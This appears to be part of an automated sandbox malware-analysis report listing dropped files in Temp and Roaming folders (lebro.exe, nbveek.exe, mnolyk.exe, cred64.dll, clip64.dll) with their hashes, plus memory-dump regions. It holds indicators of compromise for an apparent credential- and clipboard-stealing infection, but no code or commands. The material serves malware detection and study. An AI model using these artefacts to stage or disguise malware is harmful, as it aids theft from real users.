SHA1 f27bbdf26dbb193c5f5e8ee97aea6e786562fd0a
SHA256 a8d3a71edf6a6d2a647021f26bc97cf728dccf92b22663e6b9624f43fff427f4
SHA512 ec7797e25e7ccc87ecd84b2e658ce547db2ee46329c78437c03b55117cc1c56a55a6c267f92aabf5debbad324d6233c87e102db12a3d562d769c08424ed79c41

C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe

MD5 ebd584e9c1a400cd5d4bafa0e7936468
SHA1 d263c62902326425ed17855d49d35003abcd797b
SHA256 ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b
SHA512 e94b7bca0258e2f2fd374898c87196587311af4aa20f1197ef8d0fddcdc098fdd0096152d27b49cbe21a3527624339fe0c806c7aa4ea6c80b76764ee2245a010

C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe

MD5 ebd584e9c1a400cd5d4bafa0e7936468
SHA1 d263c62902326425ed17855d49d35003abcd797b
SHA256 ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b
SHA512 e94b7bca0258e2f2fd374898c87196587311af4aa20f1197ef8d0fddcdc098fdd0096152d27b49cbe21a3527624339fe0c806c7aa4ea6c80b76764ee2245a010

C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe

MD5 ebd584e9c1a400cd5d4bafa0e7936468
SHA1 d263c62902326425ed17855d49d35003abcd797b
SHA256 ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b
SHA512 e94b7bca0258e2f2fd374898c87196587311af4aa20f1197ef8d0fddcdc098fdd0096152d27b49cbe21a3527624339fe0c806c7aa4ea6c80b76764ee2245a010

C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe

MD5 ebd584e9c1a400cd5d4bafa0e7936468
SHA1 d263c62902326425ed17855d49d35003abcd797b
SHA256 ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b
SHA512 e94b7bca0258e2f2fd374898c87196587311af4aa20f1197ef8d0fddcdc098fdd0096152d27b49cbe21a3527624339fe0c806c7aa4ea6c80b76764ee2245a010

C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe

MD5 ebd584e9c1a400cd5d4bafa0e7936468
SHA1 d263c62902326425ed17855d49d35003abcd797b
SHA256 ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b
SHA512 e94b7bca0258e2f2fd374898c87196587311af4aa20f1197ef8d0fddcdc098fdd0096152d27b49cbe21a3527624339fe0c806c7aa4ea6c80b76764ee2245a010

memory/1824-2143-0x00000000071E0000-0x00000000071F0000-memory.dmp

memory/1824-2141-0x00000000071E0000-0x00000000071F0000-memory.dmp

memory/1824-2144-0x00000000071E0000-0x00000000071F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe

MD5 af4268c094f2a9c6e6a85f8626b9a5c7
SHA1 7d6b6083ec9081f52517cc7952dfb0c1c416e395
SHA256 07b974442b53035b8d057a7b429c191fe71f149a698041b005ee85645a89c165
SHA512 2ab2d4771841ebbeb195d21697c1708db985ae821a7ed3e2bb050c5759fbdb1e7784354fa5611e377a603a6db437e90a7258ecfcbea7703e584330b91eacac68

C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe

MD5 af4268c094f2a9c6e6a85f8626b9a5c7
SHA1 7d6b6083ec9081f52517cc7952dfb0c1c416e395
SHA256 07b974442b53035b8d057a7b429c191fe71f149a698041b005ee85645a89c165
SHA512 2ab2d4771841ebbeb195d21697c1708db985ae821a7ed3e2bb050c5759fbdb1e7784354fa5611e377a603a6db437e90a7258ecfcbea7703e584330b91eacac68

C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe

MD5 af4268c094f2a9c6e6a85f8626b9a5c7
SHA1 7d6b6083ec9081f52517cc7952dfb0c1c416e395
SHA256 07b974442b53035b8d057a7b429c191fe71f149a698041b005ee85645a89c165
SHA512 2ab2d4771841ebbeb195d21697c1708db985ae821a7ed3e2bb050c5759fbdb1e7784354fa5611e377a603a6db437e90a7258ecfcbea7703e584330b91eacac68

C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe

MD5 b7c05216d55cd437ddd7edd811cdee80
SHA1 ba0490a14b8243f684d9b9975b7e6c5087f976e1
SHA256 922a4c143d4517afbd2a8254776283a2b8982a6ed6950a0024ca86357db1eab8
SHA512 d3ea0b9515c9138ef6f7459b9fe3a91af03d38dddd538776c054731bfb4df78fa19794163c725c5ee0d906041c16ac53dff9d1fe7b2579564fabb1b5d394ee10

C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe

MD5 b7c05216d55cd437ddd7edd811cdee80
SHA1 ba0490a14b8243f684d9b9975b7e6c5087f976e1
SHA256 922a4c143d4517afbd2a8254776283a2b8982a6ed6950a0024ca86357db1eab8
SHA512 d3ea0b9515c9138ef6f7459b9fe3a91af03d38dddd538776c054731bfb4df78fa19794163c725c5ee0d906041c16ac53dff9d1fe7b2579564fabb1b5d394ee10

C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe

MD5 b7c05216d55cd437ddd7edd811cdee80
SHA1 ba0490a14b8243f684d9b9975b7e6c5087f976e1
SHA256 922a4c143d4517afbd2a8254776283a2b8982a6ed6950a0024ca86357db1eab8
SHA512 d3ea0b9515c9138ef6f7459b9fe3a91af03d38dddd538776c054731bfb4df78fa19794163c725c5ee0d906041c16ac53dff9d1fe7b2579564fabb1b5d394ee10

memory/3516-2461-0x00000000002A0000-0x0000000000318000-memory.dmp

memory/3516-2468-0x0000000002960000-0x0000000002A00000-memory.dmp

memory/3516-2485-0x00000000028E0000-0x00000000028F0000-memory.dmp

memory/1824-2889-0x00000000071E0000-0x00000000071F0000-memory.dmp

memory/1824-2892-0x00000000071E0000-0x00000000071F0000-memory.dmp

memory/1824-2895-0x00000000071E0000-0x00000000071F0000-memory.dmp

memory/3516-3097-0x00000000028E0000-0x00000000028F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nJObCsNVlgTeMaPEZQleQYhYzRyWJjPj

MD5 95a12fa5756d0040e1c1284371ea17e4
SHA1 a9c9c457a87ecca994364b6b0a8bbe815c64197d
SHA256 805458918a058fbae738b7e4fc57e4d3b8317adf26d11b9b9e53e22bc946b562
SHA512 1d71748f56e83e3d8e68bcec6a17ace238d904e767a10ef20c86be8c785ab3c3fea60c832e3b68e0277467ac1b053849d1f3d52bd872b2b9aa7206616ced56c5

memory/1824-3520-0x0000000008000000-0x000000000804B000-memory.dmp

memory/1824-3521-0x00000000071E0000-0x00000000071F0000-memory.dmp

memory/3516-3872-0x00000000028F0000-0x0000000002946000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe

MD5 a7ad3f23c4bdb0122dbb1557223eee4c
SHA1 fe2201cdb7f2f678d533abd2b0479cdadc63c54d
SHA256 947d7ec35a3e57d7b835bb14276584cce4b926a9e9ea6378d10b2d9069d0b59f
SHA512 8df206f3a3b07b0c5a119fb2c75697cb7055f2f313f35a140542f212e8b4133ada7d74a42b27865b4000f5d20fc2727783da92cea91f56fe7fdff77dddffae2b

C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe

MD5 ebd584e9c1a400cd5d4bafa0e7936468
SHA1 d263c62902326425ed17855d49d35003abcd797b
SHA256 ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b
SHA512 e94b7bca0258e2f2fd374898c87196587311af4aa20f1197ef8d0fddcdc098fdd0096152d27b49cbe21a3527624339fe0c806c7aa4ea6c80b76764ee2245a010

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nMq28wd95.exe

MD5 d56d7c144f628c19a5b62e62a478c3d5
SHA1 46de41d4635fef57622bc406c6df50c8a9f4a31b
SHA256 ef31ddae2d0b1dfc0ae3dd18cacbcf752a7c63ffc51ffdd8ec921184facc4659
SHA512 615856535a8f4be508740c0df9e6c16c3ecbb91dd257968b23c6e70f67990c44ccb946b963228dac88cc60aa3e669dfd85805c855bf88f37acca42f2c5332b26

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nMq28wd95.exe

MD5 d56d7c144f628c19a5b62e62a478c3d5
SHA1 46de41d4635fef57622bc406c6df50c8a9f4a31b
SHA256 ef31ddae2d0b1dfc0ae3dd18cacbcf752a7c63ffc51ffdd8ec921184facc4659
SHA512 615856535a8f4be508740c0df9e6c16c3ecbb91dd257968b23c6e70f67990c44ccb946b963228dac88cc60aa3e669dfd85805c855bf88f37acca42f2c5332b26

memory/4916-3880-0x00000000009D0000-0x0000000000A02000-memory.dmp

memory/4916-3881-0x0000000005410000-0x000000000545B000-memory.dmp

memory/4916-3882-0x0000000005210000-0x0000000005220000-memory.dmp

memory/3516-3883-0x000000001BF20000-0x000000001BF6C000-memory.dmp

memory/3516-3884-0x000000001CB90000-0x000000001CBE4000-memory.dmp

memory/3516-3886-0x00000000028E0000-0x00000000028F0000-memory.dmp

memory/3516-3887-0x00000000028E0000-0x00000000028F0000-memory.dmp

memory/3516-3889-0x000000001D330000-0x000000001D346000-memory.dmp

memory/3996-3896-0x0000000140000000-0x00000001407CD000-memory.dmp

memory/3516-3902-0x00000000028E0000-0x00000000028F0000-memory.dmp

memory/3516-3901-0x00000000028E0000-0x00000000028F0000-memory.dmp

memory/3996-3903-0x0000011A44060000-0x0000011A440A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 1b7c22a214949975556626d7217e9a39
SHA1 d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512 ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 937b902b8ad05afb922313d2341143f4
SHA1 b48d5579e01000cdb3c3ef4e1ad1b97d2056a8b1
SHA256 f0f0e7ab301101e6473f1dbcadd2272468af036195685c0ae51c9d90c40f0849
SHA512 91f67248e47b2fced9ff802370ced4e0de675d06e7ef32acd40a479fecfe8b912dfb2abf76cb8b391f471d8dd134b5f041186541a8038ef84219c852f31f37ff

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 937b902b8ad05afb922313d2341143f4
SHA1 b48d5579e01000cdb3c3ef4e1ad1b97d2056a8b1
SHA256 f0f0e7ab301101e6473f1dbcadd2272468af036195685c0ae51c9d90c40f0849
SHA512 91f67248e47b2fced9ff802370ced4e0de675d06e7ef32acd40a479fecfe8b912dfb2abf76cb8b391f471d8dd134b5f041186541a8038ef84219c852f31f37ff

\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 937b902b8ad05afb922313d2341143f4
SHA1 b48d5579e01000cdb3c3ef4e1ad1b97d2056a8b1
SHA256 f0f0e7ab301101e6473f1dbcadd2272468af036195685c0ae51c9d90c40f0849
SHA512 91f67248e47b2fced9ff802370ced4e0de675d06e7ef32acd40a479fecfe8b912dfb2abf76cb8b391f471d8dd134b5f041186541a8038ef84219c852f31f37ff

C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll

MD5 d1eb5caae43e95e1f369ca373a5e192d
SHA1 bafa865f8f2cb5bddf951357e70af9fb011d6ac2
SHA256 cdd4072239d8a62bf134e9884ef2829d831efaf3f6f7f71b7266af29df145dd0
SHA512 e4f4fd7b4cfa15f5de203601e5317be2245df7cf1cb05eb9fac0a90fb2a01c42be9b6e31662d76b678c1bea731c467bed1aae61fe0c1cbb6fea3c159677b691a

C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll

MD5 e1fe62c436de6b2c3bf0fd32e0f779c1
SHA1 dbaadf172ed878592ae299e27eb98e2614b7b36b
SHA256 3492ed949b0d1cbd720eae940d122d6a791df098506c24517da0cc149089f405
SHA512 e0749db80671b0e446d54c7edb1ff11ea6ba5728eabce567bb8d81fa4aa66872d5255e4f85b816e5634eada1314ff272dd6dbf89c1b18e75702fe92ba15348ee

C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll

MD5 d1eb5caae43e95e1f369ca373a5e192d
SHA1 bafa865f8f2cb5bddf951357e70af9fb011d6ac2
SHA256 cdd4072239d8a62bf134e9884ef2829d831efaf3f6f7f71b7266af29df145dd0
SHA512 e4f4fd7b4cfa15f5de203601e5317be2245df7cf1cb05eb9fac0a90fb2a01c42be9b6e31662d76b678c1bea731c467bed1aae61fe0c1cbb6fea3c159677b691a

\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll

MD5 d1eb5caae43e95e1f369ca373a5e192d
SHA1 bafa865f8f2cb5bddf951357e70af9fb011d6ac2
SHA256 cdd4072239d8a62bf134e9884ef2829d831efaf3f6f7f71b7266af29df145dd0
SHA512 e4f4fd7b4cfa15f5de203601e5317be2245df7cf1cb05eb9fac0a90fb2a01c42be9b6e31662d76b678c1bea731c467bed1aae61fe0c1cbb6fea3c159677b691a

C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll

MD5 e1fe62c436de6b2c3bf0fd32e0f779c1
SHA1 dbaadf172ed878592ae299e27eb98e2614b7b36b
SHA256 3492ed949b0d1cbd720eae940d122d6a791df098506c24517da0cc149089f405
SHA512 e0749db80671b0e446d54c7edb1ff11ea6ba5728eabce567bb8d81fa4aa66872d5255e4f85b816e5634eada1314ff272dd6dbf89c1b18e75702fe92ba15348ee

\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll

MD5 e1fe62c436de6b2c3bf0fd32e0f779c1
SHA1 dbaadf172ed878592ae299e27eb98e2614b7b36b
SHA256 3492ed949b0d1cbd720eae940d122d6a791df098506c24517da0cc149089f405
SHA512 e0749db80671b0e446d54c7edb1ff11ea6ba5728eabce567bb8d81fa4aa66872d5255e4f85b816e5634eada1314ff272dd6dbf89c1b18e75702fe92ba15348ee

\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll

MD5 d1eb5caae43e95e1f369ca373a5e192d
SHA1 bafa865f8f2cb5bddf951357e70af9fb011d6ac2
SHA256 cdd4072239d8a62bf134e9884ef2829d831efaf3f6f7f71b7266af29df145dd0
SHA512 e4f4fd7b4cfa15f5de203601e5317be2245df7cf1cb05eb9fac0a90fb2a01c42be9b6e31662d76b678c1bea731c467bed1aae61fe0c1cbb6fea3c159677b691a

memory/3996-3946-0x0000000140000000-0x00000001407CD000-memory.dmp

memory/3996-3949-0x0000011A440A0000-0x0000011A440C0000-memory.dmp

memory/3996-3950-0x0000011A440A0000-0x0000011A440C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe

MD5 a7ad3f23c4bdb0122dbb1557223eee4c
SHA1 fe2201cdb7f2f678d533abd2b0479cdadc63c54d
SHA256 947d7ec35a3e57d7b835bb14276584cce4b926a9e9ea6378d10b2d9069d0b59f
SHA512 8df206f3a3b07b0c5a119fb2c75697cb7055f2f313f35a140542f212e8b4133ada7d74a42b27865b4000f5d20fc2727783da92cea91f56fe7fdff77dddffae2b

C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe

MD5 ebd584e9c1a400cd5d4bafa0e7936468
SHA1 d263c62902326425ed17855d49d35003abcd797b
SHA256 ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b
SHA512 e94b7bca0258e2f2fd374898c87196587311af4aa20f1197ef8d0fddcdc098fdd0096152d27b49cbe21a3527624339fe0c806c7aa4ea6c80b76764ee2245a010